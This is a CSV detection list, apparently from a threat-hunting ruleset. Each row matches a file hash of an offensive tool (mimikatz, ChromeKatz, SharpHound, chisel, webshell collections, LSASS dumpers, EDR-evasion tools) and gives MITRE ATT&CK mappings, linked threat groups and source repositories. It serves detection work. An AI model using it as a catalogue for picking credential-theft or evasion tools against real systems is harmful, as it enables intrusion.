"*33ccc2fca462fcf743513e4f01ebe3b7302e0158a44b8dfa1f3e56b78b3ff0be*",".{0,1000}33ccc2fca462fcf743513e4f01ebe3b7302e0158a44b8dfa1f3e56b78b3ff0be.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","24437"
"*33ccc2fca462fcf743513e4f01ebe3b7302e0158a44b8dfa1f3e56b78b3ff0be*",".{0,1000}33ccc2fca462fcf743513e4f01ebe3b7302e0158a44b8dfa1f3e56b78b3ff0be.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","24438"
"*33d0f399-f79a-44a2-a487-21fce657be35*",".{0,1000}33d0f399\-f79a\-44a2\-a487\-21fce657be35.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","#GUIDProject","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","24439"
"*33df490ca748ef4411c8423fd6b2b9afa0c120b4faef525ddf2d39bb60001c16*",".{0,1000}33df490ca748ef4411c8423fd6b2b9afa0c120b4faef525ddf2d39bb60001c16.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","24441"
"*33e7acd14174cdbc8fafe359356c3817df0aa5abded5614c6e2e77ff089e6fb2*",".{0,1000}33e7acd14174cdbc8fafe359356c3817df0aa5abded5614c6e2e77ff089e6fb2.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","24446"
"*33f8a337f8226b5c4dc3ef7ded1d82973b81f9b188123e1db551c7265831b141*",".{0,1000}33f8a337f8226b5c4dc3ef7ded1d82973b81f9b188123e1db551c7265831b141.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24447"
"*33ff6cd5604aa7d47c048e328546a890a4e5eb1cbbb578aeb78c41454d449212*",".{0,1000}33ff6cd5604aa7d47c048e328546a890a4e5eb1cbbb578aeb78c41454d449212.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24448"
"*3404870416355a3fb4bf2d43695606b77785e6fbf534f2f6a536861ffcc9de81*",".{0,1000}3404870416355a3fb4bf2d43695606b77785e6fbf534f2f6a536861ffcc9de81.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24451"
"*340ce55adab1112723a9947962c3557daeb2ed12fdb535f99dd8b66682356ebf*",".{0,1000}340ce55adab1112723a9947962c3557daeb2ed12fdb535f99dd8b66682356ebf.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24452"
"*340ced72dda48a480d8a7d3f4e4d55af5de3f32bd61806362c04b7081bb11607*",".{0,1000}340ced72dda48a480d8a7d3f4e4d55af5de3f32bd61806362c04b7081bb11607.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","0","#filehash","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","24453"
"*340df9bf5aa4527010e535905f4e4926e70b7d6b7716491638a920c37d717a34*",".{0,1000}340df9bf5aa4527010e535905f4e4926e70b7d6b7716491638a920c37d717a34.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24454"
"*340ebf838dd969bc96dde3068e57e62b30726e78bc663ef60ad6cbd7c5d8716a*",".{0,1000}340ebf838dd969bc96dde3068e57e62b30726e78bc663ef60ad6cbd7c5d8716a.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","0","#filehash","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","24455"
"*3422b5b6a7d4b662727baf8a4615c884a4295b71b8d0412130415b737a4cd216*",".{0,1000}3422b5b6a7d4b662727baf8a4615c884a4295b71b8d0412130415b737a4cd216.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","#filehash","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","24457"
"*3425d6a0a29537eb9bc8e98680cff7dd16280122f59ef4eb03d7a48760c053a7*",".{0,1000}3425d6a0a29537eb9bc8e98680cff7dd16280122f59ef4eb03d7a48760c053a7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24458"
"*342d4b1d90f163fdbce23c4bffe2fdeecb420df0472cb44a272c2a4f604f8758*",".{0,1000}342d4b1d90f163fdbce23c4bffe2fdeecb420df0472cb44a272c2a4f604f8758.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","0","#filehash","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","24461"
"*3443273660bae2e0f9feaaece977a654529e7161a2b753fddf986b0bbab1dca9*",".{0,1000}3443273660bae2e0f9feaaece977a654529e7161a2b753fddf986b0bbab1dca9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24464"
"*344b5c21c7902f2e11bb0ad052fd1a902f78656db34d17ced443717587af44c0*",".{0,1000}344b5c21c7902f2e11bb0ad052fd1a902f78656db34d17ced443717587af44c0.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","24467"
"*344d745c959810475c1d202f2348e644452905c1d58aaf404d1ae25e59e51d38*",".{0,1000}344d745c959810475c1d202f2348e644452905c1d58aaf404d1ae25e59e51d38.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","24468"
"*345fc62946d3c63291d8213af4a8a757387754424cc01aa55db6334995286059*",".{0,1000}345fc62946d3c63291d8213af4a8a757387754424cc01aa55db6334995286059.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24472"
"*3461b057cfdf4259e44f40a0ad4490da3dd8ec511048f9eeac3dd224284a72d0*",".{0,1000}3461b057cfdf4259e44f40a0ad4490da3dd8ec511048f9eeac3dd224284a72d0.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24473"
"*3467732ca9073986794fb5faef8e37ede70e8fd22dccff7eb484d388ed5b2b14*",".{0,1000}3467732ca9073986794fb5faef8e37ede70e8fd22dccff7eb484d388ed5b2b14.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","24474"
"*346f046d9956ddb6746649bd1f69d04f7df776532b191cc4bcb8f80792624f15*",".{0,1000}346f046d9956ddb6746649bd1f69d04f7df776532b191cc4bcb8f80792624f15.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","24475"
"*3474e3348216b672c72d7a5c0cb32103c82ab2b5f7deb9a48a566f95361a0ac5*",".{0,1000}3474e3348216b672c72d7a5c0cb32103c82ab2b5f7deb9a48a566f95361a0ac5.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24477"
"*347e20ccd42d4346d9a1cb3255d77b493d3b1b52be12f72ccaa9085d6b5dd30f*",".{0,1000}347e20ccd42d4346d9a1cb3255d77b493d3b1b52be12f72ccaa9085d6b5dd30f.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","#filehash","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","24478"
"*347e7990aad2244990071b8b5648aeb675a7792b742ebbc08035c80c916702a4*",".{0,1000}347e7990aad2244990071b8b5648aeb675a7792b742ebbc08035c80c916702a4.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24479"
"*34813bb9fdd3b929c12a273710e37882dc2171e4e910f2f0c82b2501ebc69143*",".{0,1000}34813bb9fdd3b929c12a273710e37882dc2171e4e910f2f0c82b2501ebc69143.{0,1000}","offensive_tool_keyword","ElusiveMice","Cobalt Strike User-Defined Reflective Loader with AV/EDR Evasion in mind","T1620 - T1055.012 - T1202","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/mgeeky/ElusiveMice","1","0","#filehash","N/A","10","5","449","78","2023-07-12T17:54:07Z","2021-08-27T19:22:20Z","24481"
"*348980f606af2f76e3fb4ac9e1e66f3eb42da0091e72695942a3e97ff7977c0b*",".{0,1000}348980f606af2f76e3fb4ac9e1e66f3eb42da0091e72695942a3e97ff7977c0b.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","24484"
"*349728a1f521a0584cd5da88fd781c2927a6b2b6da356d79279b695c0af987b6*",".{0,1000}349728a1f521a0584cd5da88fd781c2927a6b2b6da356d79279b695c0af987b6.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","24486"
"*349e1cbedb140c5fee7c464c53b2f038082db6079e79101717197cbb51d55cda*",".{0,1000}349e1cbedb140c5fee7c464c53b2f038082db6079e79101717197cbb51d55cda.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24488"
"*349f76bc4ae2326df15117c4b0c20a5e8a0f3491e83e7ea15fdbd02d67e45e8e*",".{0,1000}349f76bc4ae2326df15117c4b0c20a5e8a0f3491e83e7ea15fdbd02d67e45e8e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24490"
"*34a3dda90725d2179dbb2bbead3e076cf7f2f6f5d7f93ec81c371f7640b034c4*",".{0,1000}34a3dda90725d2179dbb2bbead3e076cf7f2f6f5d7f93ec81c371f7640b034c4.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#filehash","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","24491"
"*34aa130f8c55629bb00cad0d4834c274b5408cabd49579ee3d75d2cf5054ba9e*",".{0,1000}34aa130f8c55629bb00cad0d4834c274b5408cabd49579ee3d75d2cf5054ba9e.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","0","#filehash","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","24492"
"*34b1b9b6a69e55a9a8ee08e26eb932ea6e8823c4a93c2d95e0e7b33376492827*",".{0,1000}34b1b9b6a69e55a9a8ee08e26eb932ea6e8823c4a93c2d95e0e7b33376492827.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","24495"
"*34b4ac22a90064a96fcea9ff8e3f5f3bd089af9672d0e5313d3b1b8f0f0a9125*",".{0,1000}34b4ac22a90064a96fcea9ff8e3f5f3bd089af9672d0e5313d3b1b8f0f0a9125.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24496"
"*34b57458547e8ecd072caffdd5f390098197f2bef7cee067b0122b2c153f4b01*",".{0,1000}34b57458547e8ecd072caffdd5f390098197f2bef7cee067b0122b2c153f4b01.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","24498"
"*34b72dde693565c3427c8863bb527220a6793ecca920cfd663c900a9f0418dfe*",".{0,1000}34b72dde693565c3427c8863bb527220a6793ecca920cfd663c900a9f0418dfe.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24500"
"*34c6af80ba22f690e42ed5e7cb90547ffb98d909f61d354f1aa2beae857cbdd1*",".{0,1000}34c6af80ba22f690e42ed5e7cb90547ffb98d909f61d354f1aa2beae857cbdd1.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","24502"
"*34cd987d0aa614fd5280fc55f8b5988e8faf2d4b06c23571b48f49edab0f2a11*",".{0,1000}34cd987d0aa614fd5280fc55f8b5988e8faf2d4b06c23571b48f49edab0f2a11.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","24504"
"*34cfee78a17d917fabf8d9a2b48fb55f8231c0b24a5f4197615d140d18eb9b2d*",".{0,1000}34cfee78a17d917fabf8d9a2b48fb55f8231c0b24a5f4197615d140d18eb9b2d.{0,1000}","offensive_tool_keyword","SharpMiniDump","Create a minidump of the LSASS process from memory","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/b4rtik/SharpMiniDump","1","0","#filehash","N/A","10","3","260","49","2022-11-02T15:47:30Z","2019-09-15T13:45:42Z","24505"
"*34db2170c5e68bb656c1bc57c0932f4b89c10133d478e9459b36641da5a47c4e*",".{0,1000}34db2170c5e68bb656c1bc57c0932f4b89c10133d478e9459b36641da5a47c4e.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","24507"
"*34ea6934d6d4eca71440e0d0f3f31fb8714d2a558d1b33394ee0ba5b8b58589f*",".{0,1000}34ea6934d6d4eca71440e0d0f3f31fb8714d2a558d1b33394ee0ba5b8b58589f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24508"
"*34ee072372eb349c9e9acd137aa265eb1c3f9b4206c172b5e8deaff5b3dd90c9*",".{0,1000}34ee072372eb349c9e9acd137aa265eb1c3f9b4206c172b5e8deaff5b3dd90c9.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24509"
"*34fbf688da05fa13e0b3f8d18ae5aab81ce3865eb98908b236b8c593007adb5b*",".{0,1000}34fbf688da05fa13e0b3f8d18ae5aab81ce3865eb98908b236b8c593007adb5b.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","24511"
"*34fbf688da05fa13e0b3f8d18ae5aab81ce3865eb98908b236b8c593007adb5b*",".{0,1000}34fbf688da05fa13e0b3f8d18ae5aab81ce3865eb98908b236b8c593007adb5b.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","24512"
